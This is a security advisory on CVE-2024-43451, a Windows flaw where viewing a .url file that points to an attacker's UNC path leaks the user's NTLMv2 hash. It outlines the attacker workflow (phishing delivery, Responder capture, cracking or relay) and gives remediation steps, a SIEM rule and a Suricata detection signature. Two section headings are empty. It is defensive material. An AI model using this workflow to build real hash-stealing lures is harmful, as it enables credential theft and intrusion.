CVE-2024-43451: Windows — NTLM Hash Disclosure Spoofing

Background

NTLM hash theft has been a staple of Windows attacks for decades. There are various ways to trigger NTLM authentication to an attacker-controlled server — if the server captures the hash, it can be cracked offline or relayed to another server for authentication (Pass-the-Hash). CVE-2024-43451 is a new mechanism for achieving this without the user doing anything beyond interacting with a file in Windows Explorer.

This vulnerability was patched in November 2024 but was being exploited in the wild before the patch — specifically by a Russian threat actor targeting Ukrainian organisations, according to ClearSky Security research.

Technical Mechanism

Windows NTLM Hash Disclosure vulnerabilities work by forcing Windows to authenticate to an attacker-controlled server using NTLM, during which the NTLMv2 hash is transmitted. CVE-2024-43451 achieves this through a specific file type that, when interacted with in Windows Explorer (not necessarily opened or executed), triggers an NTLM authentication attempt.

The vulnerability involves .url files or similar shortcut/reference files that contain a reference to a UNC path (e.g., \\attacker-ip\share\). When a user:

• Right-clicks the file
• Views it in a preview pane
• Or even just selects it in Explorer

Windows proactively attempts to authenticate to the referenced UNC path to resolve it, sending the user’s NTLMv2 hash in the process.

The attacker’s workflow:

1. Deliver a malicious file (via phishing, compromised share, or download) to the target
2. User interacts with the file in Explorer (minimal interaction — viewing is enough)
3. Windows automatically attempts NTLM authentication to the attacker’s server
4. Attacker’s Responder or similar tool captures the NTLMv2 hash
5. Hash is cracked offline or relayed immediately to other services

Real-World Exploitation Evidence

ClearSky Security published analysis in November 2024 showing exploitation by a Russian threat actor (assessed as UNC5812, linked to APT29 or a related group) targeting Ukrainian government organisations:

• Malicious .url files distributed via phishing campaigns
• Files sent as part of spear-phishing emails themed around Ukrainian government topics
• Captured NTLM hashes used for lateral movement within Ukrainian government networks
• The exploitation was part of a broader campaign combining multiple Windows vulnerabilities

The ClearSky analysis specifically noted the minimal interaction required — mere file viewing triggered the hash leak.

Impact Assessment

• NTLMv2 hash capture — captured hashes can be cracked offline using hashcat or John the Ripper; weak passwords crack in minutes
• Pass-the-Hash attacks — even without cracking, the hash can be relayed to authenticate to other services (SMB shares, Exchange, web applications using Windows auth)
• Credential reuse — users who reuse passwords across services are at elevated risk
• Domain user compromise — even a regular user’s hash may grant access to shared drives or services with sensitive data
• Lateral movement enabler — NTLM relay is a cornerstone technique for moving laterally in Windows environments
• Stealthy — the user doesn’t need to “run” anything; viewing a file is enough

Affected Versions

Remediation Steps

1. Apply November 2024 Patch Tuesday updates
2. Independently of this specific CVE, consider disabling NTLM authentication where possible:
   • Group Policy: Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
   • Set “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” to “Deny All”
3. Block outbound SMB (TCP/445) and NetBIOS (TCP/139, UDP/137-138) to the internet at the perimeter
4. Quarantine .url files in email gateways
5. Enable Extended Protection for Authentication (EPA) on services that support it to mitigate NTLM relay
6. Deploy LDAP signing and LDAP channel binding on domain controllers to prevent NTLM relay to AD

Detection Guidance

Network monitoring — watch for NTLM authentication attempts from internal hosts to external IPs on port 445. This should essentially never happen on a properly configured network.

Windows Event Logs:

• Event ID 4776: NTLM authentication — correlate with unexpected target servers
• Winlogon/NTLM diagnostic logs (enable with netsh trace start capture=yes)

SIEM rule:

event_id = 4776 AND
source_workstation = (internal_host) AND
target_server NOT IN (known_internal_servers)

Suricata signature:

alert smb any any -> !$HOME_NET any (msg:"Outbound NTLM Auth Possible CVE-2024-43451 Hash Steal"; flow:established,to_server; content:"|ff|SMB"; offset:4; depth:4; classtype:credential-theft; sid:2034019; rev:1;)

Timeline